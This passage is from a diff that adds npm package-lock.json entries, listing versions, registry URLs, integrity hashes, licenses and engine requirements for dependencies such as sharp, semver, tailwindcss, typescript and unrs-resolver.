"sha512-iKE9w/Z7xCzUMIZqdBsp6pEQvwuEebH4vdpjcDWnyzaI6yl6O9FHvVpmGelvEHNsoY6wGblkxR6Zty/h00WiSA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "isarray": "^2.0.5" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/safe-regex-test": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/safe-regex-test/-/safe-regex-test-1.1.0.tgz", + "integrity": "sha512-x/+Cz4YrimQxQccJf5mKEbIa1NzeCRNI5Ecl/ekmlYaampdNLPalVyIcCZNNH3MvmqBugV5TMYZXv0ljslUlaw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "is-regex": "^1.2.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/scheduler": { + "version": "0.27.0", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.27.0.tgz", + "integrity": "sha512-eNv+WrVbKu1f3vbYJT/xtiF5syA5HPIMtf9IgY/nKg0sWqzAUEvqY/xm7OcZc/qafLx/iO9FgOmeSAp4v5ti/Q==", + "license": "MIT" + }, + "node_modules/semver": { + "version": "7.7.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.4.tgz", + "integrity": "sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==", + "devOptional": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/set-function-length": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/set-function-length/-/set-function-length-1.2.2.tgz", + "integrity": "sha512-pgRc4hJ4/sNjWCSS9AmnS40x3bNMDTknHgL5UaMBTMyJnU90EgWh1Rz+MC9eFu4BuN/UwZjKQuY/1v3rM7HMfg==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-data-property": "^1.1.4", + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + "get-intrinsic": "^1.2.4", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-function-name": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/set-function-name/-/set-function-name-2.0.2.tgz", + "integrity": "sha512-7PGFlmtwsEADb0WYyvCMa1t+yke6daIG4Wirafur5kcf+MhUnPms1UeR0CKQdTZD81yESwMHbtn+TR+dMviakQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-data-property": "^1.1.4", + "es-errors": "^1.3.0", + "functions-have-names": "^1.2.3", + "has-property-descriptors": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-proto": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/set-proto/-/set-proto-1.0.0.tgz", + "integrity": "sha512-RJRdvCo6IAnPdsvP/7m6bsQqNnn1FCBX5ZNtFL98MmFF/4xAIJTIg1YbHW5DC2W5SKZanrC6i4HsJqlajw/dZw==", + "dev": true, + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/sharp": { + "version": "0.34.5", + "resolved": "https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz", + "integrity": "sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg==", + "hasInstallScript": true, + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "@img/colour": "^1.0.0", + "detect-libc": "^2.1.2", + "semver": "^7.7.3" + }, + "engines": { + "node": "^18.17.0 || ^20.3.0 || >=21.0.0" + }, + "funding": { + "url": "https://opencollective.com/libvips" + }, + "optionalDependencies": { + "@img/sharp-darwin-arm64": "0.34.5", + "@img/sharp-darwin-x64": "0.34.5", + "@img/sharp-libvips-darwin-arm64": "1.2.4", + "@img/sharp-libvips-darwin-x64": "1.2.4", + "@img/sharp-libvips-linux-arm": "1.2.4", + "@img/sharp-libvips-linux-arm64": "1.2.4", + "@img/sharp-libvips-linux-ppc64": "1.2.4", + "@img/sharp-libvips-linux-riscv64": "1.2.4", + "@img/sharp-libvips-linux-s390x": "1.2.4", + "@img/sharp-libvips-linux-x64": "1.2.4", + "@img/sharp-libvips-linuxmusl-arm64": "1.2.4", + "@img/sharp-libvips-linuxmusl-x64": "1.2.4", + "@img/sharp-linux-arm": "0.34.5", + "@img/sharp-linux-arm64": "0.34.5", + "@img/sharp-linux-ppc64": "0.34.5", + "@img/sharp-linux-riscv64": "0.34.5", + "@img/sharp-linux-s390x": "0.34.5", + "@img/sharp-linux-x64": "0.34.5", + "@img/sharp-linuxmusl-arm64": "0.34.5", + "@img/sharp-linuxmusl-x64": "0.34.5", + "@img/sharp-wasm32": "0.34.5", + "@img/sharp-win32-arm64": "0.34.5", + "@img/sharp-win32-ia32": "0.34.5", + "@img/sharp-win32-x64": "0.34.5" + } + }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/side-channel": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz", + "integrity": "sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.3", + "side-channel-list": "^1.0.0", + "side-channel-map": "^1.0.1", + "side-channel-weakmap": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-list": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz", + "integrity": "sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-map": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz", + "integrity": "sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-weakmap": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz", + "integrity": "sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3", + "side-channel-map": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/source-map-js": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", + "license": "BSD-3-Clause", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/stable-hash": { + "version": "0.0.5", + "resolved": "https://registry.npmjs.org/stable-hash/-/stable-hash-0.0.5.tgz", + "integrity": "sha512-+L3ccpzibovGXFK+Ap/f8LOS0ahMrHTf3xu7mMLSpEGU0EO9ucaysSylKo9eRDFNhWve/y275iPmIZ4z39a9iA==", + "dev": true, + "license": "MIT" + }, + "node_modules/stop-iteration-iterator": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/stop-iteration-iterator/-/stop-iteration-iterator-1.1.0.tgz", + "integrity": "sha512-eLoXW/DHyl62zxY4SCaIgnRhuMr6ri4juEYARS8E6sCEqzKpOiE521Ucofdx+KnDZl5xmvGYaaKCk5FEOxJCoQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "internal-slot": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/string.prototype.includes": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/string.prototype.includes/-/string.prototype.includes-2.0.1.tgz", + "integrity": "sha512-o7+c9bW6zpAdJHTtujeePODAhkuicdAryFsfVKwA+wGw89wJ4GTY484WTucM9hLtDEOpOvI+aHnzqnC5lHp4Rg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.3" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/string.prototype.matchall": { + "version": "4.0.12", + "resolved": "https://registry.npmjs.org/string.prototype.matchall/-/string.prototype.matchall-4.0.12.tgz", + "integrity": "sha512-6CC9uyBL+/48dYizRf7H7VAYCMCNTBeM78x/VTUe9bFEaxBepPJDa1Ow99LqI/1yF7kuy7Q3cQsYMrcjGUcskA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.3", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.6", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.0.0", + "get-intrinsic": "^1.2.6", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "internal-slot": "^1.1.0", + "regexp.prototype.flags": "^1.5.3", + "set-function-name": "^2.0.2", + "side-channel": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.repeat": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/string.prototype.repeat/-/string.prototype.repeat-1.0.0.tgz", + "integrity": "sha512-0u/TldDbKD8bFCQ/4f5+mNRrXwZ8hg2w7ZR8wa16e8z9XpePWl3eGEcUD0OXpEH/VJH/2G3gjUtR3ZOiBe2S/w==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-properties": "^1.1.3", + "es-abstract": "^1.17.5" + } + }, + "node_modules/string.prototype.trim": { + "version": "1.2.10", + "resolved": "https://registry.npmjs.org/string.prototype.trim/-/string.prototype.trim-1.2.10.tgz", + "integrity": "sha512-Rs66F0P/1kedk5lyYyH9uBzuiI/kNRmwJAR9quK6VOtIpZ2G+hMZd+HQbbv25MgCA6gEffoMZYxlTod4WcdrKA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.2", + "define-data-property": "^1.1.4", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.5", + "es-object-atoms": "^1.0.0", + "has-property-descriptors": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trimend": { + "version": "1.0.9", + "resolved": "https://registry.npmjs.org/string.prototype.trimend/-/string.prototype.trimend-1.0.9.tgz", + "integrity": "sha512-G7Ok5C6E/j4SGfyLCloXTrngQIQU3PWtXGst3yM7Bea9FRURf1S42ZHlZZtsNque2FN2PoUhfZXYLNWwEr4dLQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.2", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trimstart": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.trimstart/-/string.prototype.trimstart-1.0.8.tgz", + "integrity": "sha512-UXSH262CSZY1tfu3G3Secr6uGLCFVPMhIqHjlgCUtCCcgihYc/xKs9djMTMUOb2j1mVSeU8EU6NWc/iQKU6Gfg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/strip-bom": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-3.0.0.tgz", + "integrity": "sha512-vavAMRXOgBVNF6nyEEmL3DBK19iRpDcoIwW+swQ+CbGiu7lju6t+JklA1MHweoWtadgt4ISVUsXLyDq34ddcwA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=4" + } + }, + "node_modules/strip-json-comments": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", + "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/styled-jsx": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.6.tgz", + "integrity": "sha512-qSVyDTeMotdvQYoHWLNGwRFJHC+i+ZvdBRYosOFgC+Wg1vx4frN2/RG/NA7SYqqvKNLf39P2LSRA2pu6n0XYZA==", + "license": "MIT", + "dependencies": { + "client-only": "0.0.1" + }, + "engines": { + "node": ">= 12.0.0" + }, + "peerDependencies": { + "react": ">= 16.8.0 || 17.x.x || ^18.0.0-0 || ^19.0.0-0" + }, + "peerDependenciesMeta": { + "@babel/core": { + "optional": true + }, + "babel-plugin-macros": { + "optional": true + } + } + }, + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/supports-preserve-symlinks-flag": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/tailwindcss": { + "version": "4.2.4", + "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-4.2.4.tgz", + "integrity": "sha512-HhKppgO81FQof5m6TEnuBWCZGgfRAWbaeOaGT00KOy/Pf/j6oUihdvBpA7ltCeAvZpFhW3j0PTclkxsd4IXYDA==", + "dev": true, + "license": "MIT" + }, + "node_modules/tapable": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/tapable/-/tapable-2.3.3.tgz", + "integrity": "sha512-uxc/zpqFg6x7C8vOE7lh6Lbda8eEL9zmVm/PLeTPBRhh1xCgdWaQ+J1CUieGpIfm2HdtsUpRv+HshiasBMcc6A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/tinyglobby": { + "version": "0.2.16", + "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz", + "integrity": "sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==", + "dev": true, + "license": "MIT", + "dependencies": { + "fdir": "^6.5.0", + "picomatch": "^4.0.4" + }, + "engines": { + "node": ">=12.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/SuperchupuDev" + } + }, + "node_modules/tinyglobby/node_modules/fdir": { + "version": "6.5.0", + "resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz", + "integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.0.0" + }, + "peerDependencies": { + "picomatch": "^3 || ^4" + }, + "peerDependenciesMeta": { + "picomatch": { + "optional": true + } + } + }, + "node_modules/tinyglobby/node_modules/picomatch": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-number": "^7.0.0" + }, + "engines": { + "node": ">=8.0" + } + }, + "node_modules/ts-api-utils": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-2.5.0.tgz", + "integrity": "sha512-OJ/ibxhPlqrMM0UiNHJ/0CKQkoKF243/AEmplt3qpRgkW8VG7IfOS41h7V8TjITqdByHzrjcS/2si+y4lIh8NA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18.12" + }, + "peerDependencies": { + "typescript": ">=4.8.4" + } + }, + "node_modules/tsconfig-paths": { + "version": "3.15.0", + "resolved": "https://registry.npmjs.org/tsconfig-paths/-/tsconfig-paths-3.15.0.tgz", + "integrity": "sha512-2Ac2RgzDe/cn48GvOe3M+o82pEFewD3UPbyoUHHdKasHwJKjds4fLXWf/Ux5kATBKN20oaFGu+jbElp1pos0mg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json5": "^0.0.29", + "json5": "^1.0.2", + "minimist": "^1.2.6", + "strip-bom": "^3.0.0" + } + }, + "node_modules/tslib": { + "version": "2.8.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", + "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", + "license": "0BSD" + }, + "node_modules/type-check": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", + "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", + "dev": true, + "license": "MIT", + "dependencies": { + "prelude-ls": "^1.2.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/typed-array-buffer": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/typed-array-buffer/-/typed-array-buffer-1.0.3.tgz", + "integrity": "sha512-nAYYwfY3qnzX30IkA6AQZjVbtK6duGontcQm1WSG1MD94YLqK0515GNApXkoxKOWMusVssAHWLh9SeaoefYFGw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "es-errors": "^1.3.0", + "is-typed-array": "^1.1.14" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/typed-array-byte-length": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/typed-array-byte-length/-/typed-array-byte-length-1.0.3.tgz", + "integrity": "sha512-BaXgOuIxz8n8pIq3e7Atg/7s+DpiYrxn4vdot3w9KbnBhcRQq6o3xemQdIfynqSeXeDrF32x+WvfzmOjPiY9lg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "for-each": "^0.3.3", + "gopd": "^1.2.0", + "has-proto": "^1.2.0", + "is-typed-array": "^1.1.14" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typed-array-byte-offset": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/typed-array-byte-offset/-/typed-array-byte-offset-1.0.4.tgz", + "integrity": "sha512-bTlAFB/FBYMcuX81gbL4OcpH5PmlFHqlCCpAl8AlEzMz5k53oNDvN8p1PNOWLEmI2x4orp3raOFB51tv9X+MFQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.8", + "for-each": "^0.3.3", + "gopd": "^1.2.0", + "has-proto": "^1.2.0", + "is-typed-array": "^1.1.15", + "reflect.getprototypeof": "^1.0.9" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typed-array-length": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/typed-array-length/-/typed-array-length-1.0.7.tgz", + "integrity": "sha512-3KS2b+kL7fsuk/eJZ7EQdnEmQoaho/r6KUef7hxvltNA5DR8NAUM+8wJMbJyZ4G9/7i3v5zPBIMN5aybAh2/Jg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "is-typed-array": "^1.1.13", + "possible-typed-array-names": "^1.0.0", + "reflect.getprototypeof": "^1.0.6" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typescript": { + "version": "5.9.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.9.3.tgz", + "integrity": "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==", + "dev": true, + "license": "Apache-2.0", + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/unbox-primitive": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz", + "integrity": "sha512-nWJ91DjeOkej/TA8pXQ3myruKpKEYgqvpw9lz4OPHj/NWFNluYrjbz9j01CJ8yKQd2g4jFoOkINCTW2I5LEEyw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "has-bigints": "^1.0.2", + "has-symbols": "^1.1.0", + "which-boxed-primitive": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/unrs-resolver": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/unrs-resolver/-/unrs-resolver-1.11.1.tgz", + "integrity": "sha512-bSjt9pjaEBnNiGgc9rUiHGKv5l4/TGzDmYw3RhnkJGtLhbnnA/5qJj7x3dNDCRx/PJxu774LlH8lCOlB4hEfKg==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "dependencies": { + "napi-postinstall": "^0.3.0" + }, + "funding": { + "url": "https://opencollective.com/unrs-resolver" + }, + "optionalDependencies": { + "@unrs/resolver-binding-android-arm-eabi": "1.11.1", + "@unrs/resolver-binding-android-arm64": "1.11.1", + "@unrs/resolver-binding-darwin-arm64": "1.11.1", + "@unrs/resolver-binding-darwin-x64": "1.11.1", + "@unrs/resolver-binding-freebsd-x64": "1.11.1", + "@unrs/resolver-binding-linux-arm-gnueabihf": "1.11.1", + "@unrs/resolver-binding-linux-arm-musleabihf": "1.11.1", + "@unrs/resolver-binding-linux-arm64-gnu": "1.11.1", + "@unrs/resolver-binding-linux-arm64-musl": "1.11.1", + "@unrs/resolver-binding-linux-ppc64-gnu": "1.11.1", + "@unrs/resolver-binding-linux-riscv64-gnu": "1.11.1", + "@unrs/resolver-binding-linux-riscv64-musl": "1.11.1", + "@unrs/resolver-binding-linux-s390x-gnu": "1.11.1", + "@unrs/resolver-binding-linux-x64-gnu": "1.11.1", + "@unrs/resolver-binding-linux-x64-musl": "1.11.1", + "@unrs/resolver-binding-wasm32-wasi": "1.11.1", + "@unrs/resolver-binding-win32-arm64-msvc": "1.11.1", + "@unrs/resolver-binding-win32-ia32-msvc": "1.11.1", + "@unrs/resolver-binding-win32-x64-msvc": "1.11.1" + } + }, + "node_modules/uri-js": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", + "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", + "dev": true, + "license": "BSD-2-Clause", + "dependencies": { + "punycode": "^2.1.0" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, + "license": "ISC", + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/which-boxed-primitive": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/which-boxed-primitive/-/which-boxed-primitive-1.1.1.tgz", + "integrity": "sha512-TbX3mj8n0odCBFVlY8AxkqcHASw3L60jIuF8jFP78az3C2YhmGvqbHBpAjTRH2/xqYunrJ9g1jSyjCjpoWzIAA==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-bigint": "^1.1.0", + "is-boolean-object": "^1.2.1", + "is-number-object": "^1.1.1", + "is-string": "^1.1.1", + "is-symbol": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-builtin-type": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/which-builtin-type/-/which-builtin-type-1.2.1.tgz", + "integrity": "sha512-6iBczoX+kDQ7a3+YJBnh3T+KZRxM/iYNPXicqk66/Qfm1b93iu+yOImkg0zHbj5LNOcNv1TEADiZ0xa34B4q6Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "function.prototype.name": "^1.1.6", + "has-tostringtag": "^1.0.2", + "is-async-function": "^2.0.0", + "is-date-object": "^1.1.0", + "is-finalizationregistry": "^1.1.0", + "is-generator-function": "^1.0.10", + "is-regex": "^1.2.1", + "is-weakref": "^1.0.2", + "isarray": "^2.0.5", + "which-boxed-primitive": "^1.1.0", + "which-collection": "^1.0.2", + "which-typed-array": "^1.1.16" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-collection": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/which-collection/-/which-collection-1.0.2.tgz", + "integrity": "sha512-K4jVyjnBdgvc86Y6BkaLZEN933SwYOuBFkdmBu9ZfkcAbdVbpITnDmjvZ/aQjRXQrv5EPkTnD1s39GiiqbngCw==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-map": "^2.0.3", + "is-set": "^2.0.3", + "is-weakmap": "^2.0.2", + "is-weakset": "^2.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-typed-array": { + "version": 